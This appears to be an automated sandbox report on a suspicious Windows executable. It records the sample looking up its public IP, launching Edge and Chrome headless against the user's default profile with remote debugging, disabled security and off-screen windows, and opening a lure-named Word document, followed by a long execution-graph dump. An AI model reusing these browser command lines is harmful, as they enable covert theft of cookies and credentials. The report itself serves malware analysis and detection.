                                                                                                                                                                                                        25192.168.2.449783104.26.13.2054436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:30 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                                        2025-01-14 11:40:30 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:30 GMT
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Content-Length: 12
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 901d5a004d268c9c-EWR
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1949&rtt_var=734&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1487519&cwnd=196&unsent_bytes=0&cid=c22b2ac67dd6c815&ts=153&x=0"
                                                                                                                                                                                                        2025-01-14 11:40:30 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                        Data Ascii: 8.46.123.189


                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:06:39:58
                                                                                                                                                                                                        Start date:14/01/2025
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\#U2800.exe"
                                                                                                                                                                                                        Imagebase:0x7ff732a40000
                                                                                                                                                                                                        File size:26'468'352 bytes
                                                                                                                                                                                                        MD5 hash:95C636B47AF9E07F311F711C5328AEB8
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                        Start time:06:39:58
                                                                                                                                                                                                        Start date:14/01/2025
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                                        Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:06:39:58
                                                                                                                                                                                                        Start date:14/01/2025
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9940 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                        Start time:06:39:59
                                                                                                                                                                                                        Start date:14/01/2025
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1496 --field-trial-handle=1412,i,1880480402354006827,1683441286412184854,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                                        Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:06:39:59
                                                                                                                                                                                                        Start date:14/01/2025
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1588 --field-trial-handle=1420,i,14764490756503719994,12081713537846104491,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:06:39:59
                                                                                                                                                                                                        Start date:14/01/2025
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
                                                                                                                                                                                                        Imagebase:0xfd0000
                                                                                                                                                                                                        File size:1'620'872 bytes
                                                                                                                                                                                                        MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:1.4%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:16.3%
                                                                                                                                                                                                          Total number of Nodes:866
                                                                                                                                                                                                          Total number of Limit Nodes:138
                                                                                                                                                                                                          execution_graph 106860 7ffdfb736570 106863 7ffdfb811b00 106860->106863 106862 7ffdfb736597 106864 7ffdfb811b7e 106863->106864 106866 7ffdfb811b2b 106863->106866 106865 7ffdfb811b9e 106864->106865 106864->106866 106867 7ffdfb811b43 106865->106867 106868 7ffdfb811ba3 _raise_excf 106865->106868 106917 7ffdfb748730 47 API calls _raise_excf 106866->106917 106918 7ffdfb748730 47 API calls _raise_excf 106867->106918 106873 7ffdfb811c31 _raise_excf 106868->106873 106877 7ffdfb81baa0 106868->106877 106919 7ffdfb81e910 47 API calls 2 library calls 106868->106919 106871 7ffdfb811b6d 106871->106862 106874 7ffdfb811c70 106873->106874 106920 7ffdfb74ee90 11 API calls _raise_excf 106873->106920 106874->106862 106878 7ffdfb81bb0f new[] 106877->106878 106879 7ffdfb81bb89 106878->106879 106892 7ffdfb81bba7 _raise_excf 106878->106892 106941 7ffdfb7e8ea0 47 API calls _raise_excf 106879->106941 106881 7ffdfb81bc7b 106882 7ffdfb81bc97 106881->106882 106942 7ffdfb83ec40 106881->106942 106885 7ffdfb81bdc1 106882->106885 106887 7ffdfb81bcae 106882->106887 106921 7ffdfb820440 106885->106921 106886 7ffdfb81c0b6 _raise_excf 106886->106868 106889 7ffdfb81bcb7 106887->106889 106896 7ffdfb81bd04 _raise_excf 106887->106896 106947 7ffdfb7e9000 47 API calls _raise_excf 106889->106947 106891 7ffdfb81bccb 106948 7ffdfb74ee90 11 API calls _raise_excf 106891->106948 106892->106881 106895 7ffdfb81bcdf 106892->106895 106894 7ffdfb81bf76 106913 7ffdfb81bb9a _raise_excf 106894->106913 106959 7ffdfb8528b0 11 API calls _raise_excf 106894->106959 106949 7ffdfb7e9000 47 API calls _raise_excf 106895->106949 106908 7ffdfb820440 _raise_excf 48 API calls 106896->106908 106912 7ffdfb81bd64 _raise_excf 106896->106912 106897 7ffdfb81be79 106901 7ffdfb81be54 106897->106901 106954 7ffdfb7d22f0 68 API calls _raise_excf 106897->106954 106899 7ffdfb81beba 106902 7ffdfb81bf50 106899->106902 106903 7ffdfb81becc 106899->106903 106900 7ffdfb81beb2 106956 7ffdfb82eeb0 11 API calls _raise_excf 106900->106956 106901->106899 106901->106900 106955 7ffdfb83cc90 72 API calls _raise_excf 106901->106955 106902->106913 106958 7ffdfb7e8e50 11 API calls _raise_excf 106902->106958 106957 7ffdfb7e9000 47 API calls _raise_excf 106903->106957 106909 7ffdfb81bd45 106908->106909 106909->106912 106950 7ffdfb734c20 106909->106950 106912->106894 106912->106897 106912->106901 106960 7ffdfb8155a0 47 API calls _raise_excf 106913->106960 106914 7ffdfb81bedd 106914->106913 106916 7ffdfb734c20 _raise_excf 11 API calls 106914->106916 106916->106913 106917->106867 106918->106871 106919->106868 106920->106874 106933 7ffdfb820490 _raise_excf 106921->106933 106923 7ffdfb8207e1 _raise_excf 106924 7ffdfb734c20 _raise_excf 11 API calls 106923->106924 106932 7ffdfb820839 106923->106932 106924->106932 106925 7ffdfb8208fc 106979 7ffdfb748730 47 API calls _raise_excf 106925->106979 106926 7ffdfb820919 106928 7ffdfb734c20 _raise_excf 11 API calls 106926->106928 106935 7ffdfb820932 106928->106935 106929 7ffdfb8208a5 106975 7ffdfb7e8ea0 47 API calls _raise_excf 106929->106975 106930 7ffdfb82095f 106939 7ffdfb82097c 106930->106939 106981 7ffdfb7e7590 47 API calls _raise_excf 106930->106981 106932->106925 106932->106926 106976 7ffdfb811f90 106932->106976 106933->106923 106933->106929 106961 7ffdfb815f60 106933->106961 106935->106930 106980 7ffdfb75e530 47 API calls _raise_excf 106935->106980 106936 7ffdfb82099a _raise_excf 106936->106912 106939->106936 106940 7ffdfb734c20 _raise_excf 11 API calls 106939->106940 106940->106936 106941->106913 106943 7ffdfb83ed1a 106942->106943 106944 7ffdfb83ec56 _raise_excf 106942->106944 106943->106882 106944->106943 106946 7ffdfb734c20 _raise_excf 11 API calls 106944->106946 107004 7ffdfb83e800 11 API calls _raise_excf 106944->107004 106946->106944 106947->106891 106948->106913 106949->106913 106951 7ffdfb734c29 106950->106951 106952 7ffdfb734c84 106950->106952 106951->106952 107005 7ffdfb87996c 106951->107005 106952->106912 106954->106901 106955->106900 106956->106899 106957->106914 106958->106913 106959->106913 106960->106886 106966 7ffdfb815fa1 _raise_excf 106961->106966 106962 7ffdfb81608e 106963 7ffdfb8160e8 106962->106963 106964 7ffdfb816098 106962->106964 106967 7ffdfb816117 106963->106967 106968 7ffdfb81612a 106963->106968 106973 7ffdfb8160c3 _raise_excf 106963->106973 106964->106973 106983 7ffdfb867490 48 API calls 2 library calls 106964->106983 106966->106962 106970 7ffdfb8160ad 106966->106970 106982 7ffdfb867490 48 API calls 2 library calls 106966->106982 106985 7ffdfb7e8ea0 47 API calls _raise_excf 106967->106985 106986 7ffdfb7e8ea0 47 API calls _raise_excf 106968->106986 106970->106973 106984 7ffdfb8675d0 47 API calls _raise_excf 106970->106984 106973->106933 106975->106923 106987 7ffdfb82dd10 106976->106987 106978 7ffdfb811fad 106978->106925 106979->106926 106980->106930 106981->106939 106982->106966 106983->106970 106984->106973 106985->106973 106986->106973 106994 7ffdfb744eb0 106987->106994 106989 7ffdfb82dd6c 106991 7ffdfb82dd96 106989->106991 107000 7ffdfb84d060 47 API calls 2 library calls 106989->107000 106990 7ffdfb82ddaf _raise_excf 106990->106978 106991->106990 107001 7ffdfb813030 47 API calls _raise_excf 106991->107001 106995 7ffdfb744eff 106994->106995 106998 7ffdfb744f84 _raise_excf 106995->106998 106999 7ffdfb744fcf _raise_excf 106995->106999 107002 7ffdfb75f300 47 API calls _raise_excf 106995->107002 106998->106999 107003 7ffdfb75f300 47 API calls _raise_excf 106998->107003 106999->106989 107000->106991 107001->106990 107002->106998 107003->106999 107004->106944 107006 7ffdfb879971 RtlFreeHeap 107005->107006 107010 7ffdfb8799a0 107005->107010 107007 7ffdfb87998c GetLastError 107006->107007 107006->107010 107008 7ffdfb879999 __free_lconv_mon 107007->107008 107011 7ffdfb879ec8 11 API calls __free_lconv_mon 107008->107011 107010->106952 107011->107010 107012 7ffdfb735430 107027 7ffdfb84b8a0 107012->107027 107014 7ffdfb73544c 107025 7ffdfb735563 _raise_excf 107014->107025 107046 7ffdfb811fc0 107014->107046 107017 7ffdfb7354f9 107024 7ffdfb735548 107017->107024 107017->107025 107124 7ffdfb8527e0 11 API calls _raise_excf 107017->107124 107019 7ffdfb7354b3 107019->107017 107021 7ffdfb7354cd 107019->107021 107123 7ffdfb850e80 47 API calls _raise_excf 107019->107123 107021->107017 107051 7ffdfb7bf5d0 107021->107051 107022 7ffdfb734c20 _raise_excf 11 API calls 107022->107025 107024->107022 107024->107025 107028 7ffdfb84b8ad 107027->107028 107029 7ffdfb84b8b5 _raise_excf 107027->107029 107028->107014 107032 7ffdfb84b93c new[] _raise_excf 107029->107032 107045 7ffdfb84bc14 107029->107045 107134 7ffdfb84b1d0 47 API calls _raise_excf 107029->107134 107031 7ffdfb84b8a0 _raise_excf 48 API calls 107034 7ffdfb84bb0c 107031->107034 107035 7ffdfb84badf 107032->107035 107032->107045 107135 7ffdfb84b1d0 47 API calls _raise_excf 107032->107135 107036 7ffdfb811fc0 new[] 47 API calls 107034->107036 107034->107045 107035->107031 107035->107045 107037 7ffdfb84bb1c 107036->107037 107038 7ffdfb734c20 _raise_excf 11 API calls 107037->107038 107037->107045 107039 7ffdfb84bb2d 107038->107039 107125 7ffdfb84be70 GetSystemInfo 107039->107125 107042 7ffdfb84b8a0 _raise_excf 48 API calls 107044 7ffdfb84bb41 107042->107044 107043 7ffdfb84b8a0 _raise_excf 48 API calls 107043->107045 107044->107043 107044->107045 107045->107014 107047 7ffdfb73546f 107046->107047 107048 7ffdfb811fd9 107046->107048 107047->107017 107050 7ffdfb83afa0 47 API calls _raise_excf 107047->107050 107048->107047 107136 7ffdfb7339b0 107048->107136 107050->107019 107052 7ffdfb84b8a0 _raise_excf 48 API calls 107051->107052 107054 7ffdfb7bf607 107052->107054 107053 7ffdfb7bfec6 107053->107017 107054->107053 107055 7ffdfb811fc0 new[] 47 API calls 107054->107055 107056 7ffdfb7bf67d new[] 107055->107056 107058 7ffdfb7bf6e3 107056->107058 107059 7ffdfb7bf6a6 107056->107059 107060 7ffdfb7bf6ba 107056->107060 107081 7ffdfb7bf6b2 107056->107081 107141 7ffdfb75d050 107058->107141 107061 7ffdfb734c20 _raise_excf 11 API calls 107059->107061 107060->107058 107064 7ffdfb7bf6d3 107060->107064 107061->107081 107063 7ffdfb7bf7e1 107065 7ffdfb75d050 47 API calls 107063->107065 107066 7ffdfb734c20 _raise_excf 11 API calls 107064->107066 107067 7ffdfb7bf800 107065->107067 107066->107081 107068 7ffdfb75d050 47 API calls 107067->107068 107069 7ffdfb7bf81f 107068->107069 107071 7ffdfb75d050 47 API calls 107069->107071 107070 7ffdfb7bfa11 107070->107053 107072 7ffdfb734c20 _raise_excf 11 API calls 107070->107072 107073 7ffdfb7bf846 107071->107073 107072->107053 107074 7ffdfb75d050 47 API calls 107073->107074 107075 7ffdfb7bf86d 107074->107075 107076 7ffdfb7bf89e 107075->107076 107077 7ffdfb7bf892 107075->107077 107094 7ffdfb7bf91e 107075->107094 107214 7ffdfb8157f0 48 API calls 2 library calls 107076->107214 107213 7ffdfb812770 47 API calls _raise_excf 107077->107213 107080 7ffdfb7bf89c 107082 7ffdfb7bfa1a 107080->107082 107083 7ffdfb7bf8f3 107080->107083 107081->107070 107190 7ffdfb7e00e0 107081->107190 107155 7ffdfb7ddf40 107082->107155 107086 7ffdfb7bf900 107083->107086 107215 7ffdfb813030 47 API calls _raise_excf 107083->107215 107085 7ffdfb7bf9da 107217 7ffdfb748730 47 API calls _raise_excf 107085->107217 107216 7ffdfb7e9000 47 API calls _raise_excf 107086->107216 107087 7ffdfb7bfa40 107091 7ffdfb7bfa64 _raise_excf 107087->107091 107092 7ffdfb7bfa44 107087->107092 107220 7ffdfb8215e0 47 API calls 2 library calls 107091->107220 107219 7ffdfb7e8e50 11 API calls _raise_excf 107092->107219 107093 7ffdfb7bf9f0 107218 7ffdfb748730 47 API calls _raise_excf 107093->107218 107094->107081 107094->107085 107098 7ffdfb7bfa90 _raise_excf 107221 7ffdfb8215e0 47 API calls 2 library calls 107098->107221 107100 7ffdfb7bfad5 107100->107094 107101 7ffdfb7bfb36 107100->107101 107222 7ffdfb7e8e50 11 API calls _raise_excf 107100->107222 107223 7ffdfb743030 48 API calls _raise_excf 107101->107223 107104 7ffdfb7bfb54 107105 7ffdfb7bfb61 107104->107105 107224 7ffdfb813030 47 API calls _raise_excf 107104->107224 107107 7ffdfb7bfb71 107105->107107 107109 7ffdfb7bfbb7 107105->107109 107225 7ffdfb748730 47 API calls _raise_excf 107107->107225 107111 7ffdfb7bfbaf 107109->107111 107121 7ffdfb7bfc05 107109->107121 107110 7ffdfb7bfb87 107226 7ffdfb748730 47 API calls _raise_excf 107110->107226 107230 7ffdfb7e8e50 11 API calls _raise_excf 107111->107230 107112 7ffdfb7bfd4c 107115 7ffdfb7bfda2 107112->107115 107117 7ffdfb7bfd5f 107112->107117 107115->107094 107231 7ffdfb7d5640 47 API calls 2 library calls 107115->107231 107228 7ffdfb748730 47 API calls _raise_excf 107117->107228 107119 7ffdfb7bfd75 107229 7ffdfb748730 47 API calls _raise_excf 107119->107229 107121->107112 107227 7ffdfb7e9000 47 API calls _raise_excf 107121->107227 107123->107021 107124->107024 107126 7ffdfb84b8a0 _raise_excf 47 API calls 107125->107126 107129 7ffdfb84beaa 107126->107129 107127 7ffdfb84b8a0 _raise_excf 47 API calls 107131 7ffdfb84bf5f 107127->107131 107128 7ffdfb84b8a0 _raise_excf 47 API calls 107132 7ffdfb84c031 107128->107132 107129->107127 107130 7ffdfb84b8a0 _raise_excf 47 API calls 107133 7ffdfb84bb32 107130->107133 107131->107128 107132->107130 107133->107042 107133->107045 107134->107032 107135->107035 107137 7ffdfb7339c5 107136->107137 107138 7ffdfb7339df 107137->107138 107140 7ffdfb748730 47 API calls _raise_excf 107137->107140 107138->107047 107140->107138 107142 7ffdfb75d0bf _raise_excf 107141->107142 107143 7ffdfb75d079 107141->107143 107148 7ffdfb75d11d 107142->107148 107154 7ffdfb75d149 _raise_excf 107142->107154 107143->107142 107144 7ffdfb75d082 107143->107144 107232 7ffdfb748730 47 API calls _raise_excf 107144->107232 107146 7ffdfb75d0ac 107146->107063 107233 7ffdfb7e9000 47 API calls _raise_excf 107148->107233 107149 7ffdfb75d1ec 107153 7ffdfb75d1f4 107149->107153 107235 7ffdfb7e8e50 11 API calls _raise_excf 107149->107235 107151 7ffdfb75d131 107151->107063 107153->107063 107234 7ffdfb7efac0 47 API calls 2 library calls 107154->107234 107156 7ffdfb7ddf8f 107155->107156 107157 7ffdfb811fc0 new[] 47 API calls 107156->107157 107162 7ffdfb7de009 107157->107162 107158 7ffdfb811fc0 new[] 47 API calls 107160 7ffdfb7de27d 107158->107160 107159 7ffdfb7de0ad _raise_excf 107159->107087 107161 7ffdfb7de552 107160->107161 107236 7ffdfb8140d0 107160->107236 107165 7ffdfb734c20 _raise_excf 11 API calls 107161->107165 107162->107159 107164 7ffdfb811fc0 new[] 47 API calls 107162->107164 107182 7ffdfb7de260 107162->107182 107166 7ffdfb7de099 107164->107166 107167 7ffdfb7de754 107165->107167 107168 7ffdfb7de0a5 107166->107168 107175 7ffdfb7de0d6 107166->107175 107169 7ffdfb734c20 _raise_excf 11 API calls 107167->107169 107171 7ffdfb734c20 _raise_excf 11 API calls 107168->107171 107169->107159 107170 7ffdfb7de2ea _raise_excf 107174 7ffdfb7de374 107170->107174 107186 7ffdfb7de4bb 107170->107186 107262 7ffdfb7236f0 107170->107262 107171->107159 107172 7ffdfb7de0df _raise_excf 107183 7ffdfb7de1f5 107172->107183 107184 7ffdfb7de448 107172->107184 107174->107186 107270 7ffdfb814ea0 47 API calls _raise_excf 107174->107270 107175->107172 107176 7ffdfb7de128 107175->107176 107177 7ffdfb734c20 _raise_excf 11 API calls 107176->107177 107178 7ffdfb7de130 107177->107178 107179 7ffdfb734c20 _raise_excf 11 API calls 107178->107179 107179->107159 107180 7ffdfb734c20 _raise_excf 11 API calls 107180->107182 107182->107158 107182->107186 107183->107180 107185 7ffdfb734c20 _raise_excf 11 API calls 107184->107185 107187 7ffdfb7de47f 107185->107187 107186->107159 107186->107161 107271 7ffdfb8138b0 107186->107271 107188 7ffdfb734c20 _raise_excf 11 API calls 107187->107188 107188->107159 107191 7ffdfb7e00f6 107190->107191 107192 7ffdfb7e0104 107190->107192 107191->107070 107193 7ffdfb7e0114 107192->107193 107203 7ffdfb7e0167 _raise_excf 107192->107203 107399 7ffdfb748730 47 API calls _raise_excf 107193->107399 107195 7ffdfb7e012c 107400 7ffdfb748730 47 API calls _raise_excf 107195->107400 107197 7ffdfb7e024d 107199 7ffdfb83ec40 _raise_excf 11 API calls 107197->107199 107198 7ffdfb7e0156 107198->107070 107200 7ffdfb7e0255 _raise_excf 107199->107200 107367 7ffdfb754410 107200->107367 107201 7ffdfb7e0215 107201->107197 107402 7ffdfb83ddb0 11 API calls _raise_excf 107201->107402 107203->107201 107401 7ffdfb83ddb0 11 API calls _raise_excf 107203->107401 107205 7ffdfb7e0270 107207 7ffdfb7e02c0 107205->107207 107210 7ffdfb7e0281 107205->107210 107373 7ffdfb810790 107207->107373 107403 7ffdfb7e9000 47 API calls _raise_excf 107210->107403 107212 7ffdfb7e0294 107212->107070 107213->107080 107214->107080 107215->107086 107216->107094 107217->107093 107218->107070 107219->107094 107220->107098 107221->107100 107222->107101 107223->107104 107224->107105 107225->107110 107226->107111 107227->107121 107228->107119 107229->107094 107230->107115 107231->107094 107232->107146 107233->107151 107234->107149 107235->107153 107237 7ffdfb8142a5 107236->107237 107240 7ffdfb81415e 107236->107240 107241 7ffdfb811fc0 new[] 47 API calls 107237->107241 107246 7ffdfb814187 _raise_excf 107237->107246 107238 7ffdfb811fc0 new[] 47 API calls 107239 7ffdfb8141ff 107238->107239 107242 7ffdfb81494e 107239->107242 107250 7ffdfb81420b new[] _raise_excf 107239->107250 107240->107240 107244 7ffdfb811fc0 new[] 47 API calls 107240->107244 107240->107246 107252 7ffdfb8142cc 107241->107252 107243 7ffdfb8143de _raise_excf 107242->107243 107245 7ffdfb734c20 _raise_excf 11 API calls 107242->107245 107243->107170 107244->107246 107245->107243 107246->107238 107246->107243 107247 7ffdfb81443c 107260 7ffdfb8144a0 _raise_excf 107247->107260 107283 7ffdfb724510 107247->107283 107250->107247 107259 7ffdfb734c20 _raise_excf 11 API calls 107250->107259 107251 7ffdfb8143d6 107254 7ffdfb734c20 _raise_excf 11 API calls 107251->107254 107252->107243 107252->107246 107252->107251 107300 7ffdfb7dfb50 47 API calls _raise_excf 107252->107300 107253 7ffdfb814732 107253->107243 107302 7ffdfb7c5910 107253->107302 107254->107243 107257 7ffdfb734c20 _raise_excf 11 API calls 107257->107243 107258 7ffdfb8143c7 107258->107246 107258->107251 107259->107247 107260->107253 107301 7ffdfb814ea0 47 API calls _raise_excf 107260->107301 107267 7ffdfb72371d _raise_excf 107262->107267 107263 7ffdfb7237a0 ReadFile 107264 7ffdfb723858 107263->107264 107263->107267 107266 7ffdfb723734 new[] _raise_excf 107264->107266 107318 7ffdfb748730 47 API calls _raise_excf 107264->107318 107266->107174 107267->107263 107267->107264 107267->107266 107268 7ffdfb723830 107267->107268 107317 7ffdfb861a30 55 API calls _raise_excf 107268->107317 107270->107186 107273 7ffdfb8138e3 _raise_excf 107271->107273 107319 7ffdfb83f260 107273->107319 107275 7ffdfb8139cd _raise_excf 107276 7ffdfb813a14 _raise_excf 107275->107276 107341 7ffdfb7c1310 66 API calls _raise_excf 107275->107341 107277 7ffdfb7c5910 _raise_excf 11 API calls 107276->107277 107278 7ffdfb813af3 107277->107278 107331 7ffdfb72da70 107278->107331 107290 7ffdfb724561 107283->107290 107286 7ffdfb7249d9 _raise_excf 107286->107260 107287 7ffdfb7249d1 107288 7ffdfb734c20 _raise_excf 11 API calls 107287->107288 107288->107286 107289 7ffdfb7247c0 CreateFileW 107289->107290 107290->107286 107290->107287 107290->107289 107291 7ffdfb724aac 107290->107291 107294 7ffdfb734c20 _raise_excf 11 API calls 107290->107294 107296 7ffdfb724a72 107290->107296 107306 7ffdfb8628d0 107290->107306 107312 7ffdfb861210 56 API calls 2 library calls 107290->107312 107313 7ffdfb727490 55 API calls _raise_excf 107290->107313 107314 7ffdfb748730 47 API calls _raise_excf 107290->107314 107295 7ffdfb734c20 _raise_excf 11 API calls 107291->107295 107294->107290 107295->107286 107315 7ffdfb861a30 55 API calls _raise_excf 107296->107315 107298 7ffdfb724a9d 107316 7ffdfb7dfb50 47 API calls _raise_excf 107298->107316 107300->107258 107301->107253 107303 7ffdfb7c5919 107302->107303 107304 7ffdfb7c59fd 107302->107304 107303->107304 107305 7ffdfb734c20 _raise_excf 11 API calls 107303->107305 107304->107257 107305->107304 107307 7ffdfb862915 107306->107307 107308 7ffdfb811fc0 new[] 47 API calls 107307->107308 107310 7ffdfb862971 107307->107310 107309 7ffdfb86292a new[] 107308->107309 107309->107310 107311 7ffdfb734c20 _raise_excf 11 API calls 107309->107311 107310->107290 107311->107310 107312->107290 107313->107290 107314->107290 107315->107298 107316->107286 107317->107266 107318->107266 107320 7ffdfb83f3e1 107319->107320 107321 7ffdfb83f28f 107319->107321 107320->107275 107326 7ffdfb83f34f _raise_excf 107321->107326 107356 7ffdfb83ef90 66 API calls _raise_excf 107321->107356 107322 7ffdfb83f3be 107323 7ffdfb734c20 _raise_excf 11 API calls 107322->107323 107325 7ffdfb83f3d9 107323->107325 107327 7ffdfb734c20 _raise_excf 11 API calls 107325->107327 107326->107322 107342 7ffdfb724d70 107326->107342 107327->107320 107328 7ffdfb83f303 107328->107326 107357 7ffdfb859310 47 API calls _raise_excf 107328->107357 107332 7ffdfb72da8d 107331->107332 107333 7ffdfb72da86 107331->107333 107360 7ffdfb7c5620 107332->107360 107366 7ffdfb7c5bc0 11 API calls _raise_excf 107333->107366 107337 7ffdfb734c20 _raise_excf 11 API calls 107338 7ffdfb72dab6 107337->107338 107339 7ffdfb734c20 _raise_excf 11 API calls 107338->107339 107340 7ffdfb72dabf 107339->107340 107341->107276 107343 7ffdfb8628d0 47 API calls 107342->107343 107344 7ffdfb724d93 107343->107344 107345 7ffdfb724da5 GetFileAttributesW 107344->107345 107355 7ffdfb724d9b 107344->107355 107346 7ffdfb724e50 107345->107346 107347 7ffdfb724dc3 107345->107347 107349 7ffdfb724e67 107346->107349 107350 7ffdfb724e8d 107346->107350 107347->107346 107348 7ffdfb724dd8 DeleteFileW 107347->107348 107347->107349 107348->107347 107348->107350 107358 7ffdfb861a30 55 API calls _raise_excf 107349->107358 107352 7ffdfb724e85 107350->107352 107359 7ffdfb748730 47 API calls _raise_excf 107350->107359 107354 7ffdfb734c20 _raise_excf 11 API calls 